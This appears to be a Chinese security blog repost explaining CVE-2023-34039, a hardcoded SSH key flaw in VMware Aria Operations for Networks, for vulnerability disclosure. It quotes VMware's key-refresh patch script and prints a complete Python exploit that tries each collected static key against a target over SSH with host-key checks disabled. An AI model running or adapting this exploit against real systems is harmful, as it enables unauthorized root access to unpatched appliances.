研究人员公布VMware Aria【CVE-2023-34039】漏洞利用PoC

研究人员公布VMware Aria【CVE-2023-34039】漏洞利用PoC
2023-9-2 16:5:31 Author: 骨哥说事(查看原文) 阅读量:14 收藏

Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. VMware has evaluated the severity of this issue to be in the critical severity range with a maximum CVSSv3 base score of 9.8 CVE-2023-34039.
由于缺乏唯一的加密密钥生成，Aria Operations for Networks 包含身份验证绕过漏洞， VMware 已评估此问题的严重性处于关键严重范围内，CVSSv3 评分为 9.8， CVE-2023-34039。

ProjectDiscovery 的安全研究人员 Harsh Jaiswal (@rootxharsh) 和 Rahul Maini (@iamnoooob) 向 VMWare 报告了该漏洞。

同时VMware还提到：

具有 Aria Operations for Networks 网络访问权限的恶意行为者可以绕过 SSH 身份验证来访问 Aria Operations for Networks CLI。

有趣的是，VMware 将此漏洞命名为“网络身份验证绕过”，但在原作者看来，没有任何内容被绕过，虽然有 SSH 身份验证，但VMware 忘记了重新生成密钥。

看完以上两个描述后，原作者意识到这一定是 SSH 密钥硬编码问题， VMware 的 Aria Operations for Networks 已将其密钥从版本 6.0 硬编码到了 6.10。

VMware 已发布多个补丁文件供用户应用于其实例。这些补丁中的众多文件之一就是 bash 脚本。

refresh_ssh_keys() {
    log "Remove old public key from authorized_keys file for support user"
    chmod 666 /home/support/.ssh/authorized_keys
    sed -i "s#$(sudo cat /home/support/.ssh/id_rsa_vnera_keypair.pub)##" /home/support/.ssh/authorized_keys
    log "Remove old keys"
    rm -f /home/support/.ssh/id_rsa_vnera_keypair
    rm -f /home/support/.ssh/id_rsa_vnera_keypair.pub
    rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair
    rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub
    log "Generate new keypair for support user"
    ssh-keygen -q -t rsa -f /home/support/.ssh/id_rsa_vnera_keypair -N ''
    log "Copy new keys for ubuntu user"
    cp /home/support/.ssh/id_rsa_vnera_keypair /home/ubuntu/.ssh/
    cp /home/support/.ssh/id_rsa_vnera_keypair.pub /home/ubuntu/.ssh/
    log "Add new public key file to home/support/.ssh/authorized_keys"
    cat /home/support/.ssh/id_rsa_vnera_keypair.pub >> /home/support/.ssh/authorized_keys
    chown support:support /home/support/.ssh/authorized_keys
    log "Provide right permissions to ssh files generated"
    chmod 400 /home/support/.ssh/id_rsa_vnera_keypair
    chmod 400 /home/support/.ssh/id_rsa_vnera_keypair.pub
    chmod 640 /home/support/.ssh/authorized_keys
    chown support:support /home/support/.ssh/id_rsa_vnera_keypair
    chown support:support /home/support/.ssh/id_rsa_vnera_keypair.pub
    chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair
    chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub
    chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair
    chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub
    log "Remove Empty Lines from authorized_keys files"
    sed -i '/^$/d' /home/support/.ssh/authorized_keys
}
generic
1.68 KB
© Guge's Blog

可以看到 refresh_ssh_keys 函数负责覆盖 support 和 ubuntu 用户当前的 SSH 密钥，值得注意的是，两个用户都拥有相同的密钥，并且同属 sudoers 组，没有任何限制。

利用此漏洞的主要挑战是 VMware 的 Aria Operations for Networks 的每个版本都具有唯一的 SSH 密钥，为了创建一个功能齐全的漏洞利用程序，必须收集该产品不同版本的所有密钥，经过一段时间，原作者终于收集到了6.0到6.10版本的所有密钥，最新版本 6.11 不容易受到此问题的影响，因为 VMware 在发布之前已修复了该问题。

该产品在实现时由两个节点组成，一个称为 Platform ，另一个称为 Collector ，基本上是两台不同的机器，漏洞利用程序包含所有版本中这两个节点的密钥。

视频演示请点击下方“阅读原文”跳转观看。

目前该代码已在GitHub公开。

"""
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
Version: All versions from 6.0 to 6.10
Discovered by: Harsh Jaiswal (@rootxharsh) and Rahul Maini (@iamnoooob) at ProjectDiscovery Research
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/vmware-vrealize-network-insight-ssh-key-rce-cve-2023-34039/
"""
import argparse
import os
import subprocess
parser = argparse.ArgumentParser()
parser.add_argument('--target', '-t', help='Target IP address (192.168.1.1)', required=True)
parser.add_argument('--port', '-p', help='Target SSH Port', default='22', required=False)
args = parser.parse_args()
print("""(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
""")
def sanity_check():
    if os.name == 'posix':
        os.system('chmod -R 700 keys/')
def exploit():
    for root, dirs, files in os.walk("keys"):
        for file in files:
            key_file = str(os.path.join(root, file))
            print(f"(*) Trying key: {key_file}\n")
            ssh_command = ['ssh', '-i', key_file, '[email protected]' + args.target, '-p', args.port, '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'BatchMode=yes', '2>/dev/null']
            try:
                ssh_command = ' '.join(ssh_command)
                coutput = os.system(ssh_command)
            except Exception as e:
                log = f"(-) Failed connecting to {args.target}:{args.port} with key {key_file}!"
                continue
sanity_check()
exploit()
generic
1.71 KB
© Guge's Blog

原文出处：https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

内容由骨哥翻译并整理。

感谢阅读，如果觉得还不错的话，欢迎分享给更多喜爱的朋友～

====正文结束====

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5Mzc4MzUzMQ==&mid=2650257120&idx=1&sn=32949846c1553a7f1bbea434e5c531df&chksm=be92dd6489e5547255809381bbb2d503b8f712d373eeebd9524b07e15b2d40f2e854f380a831&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh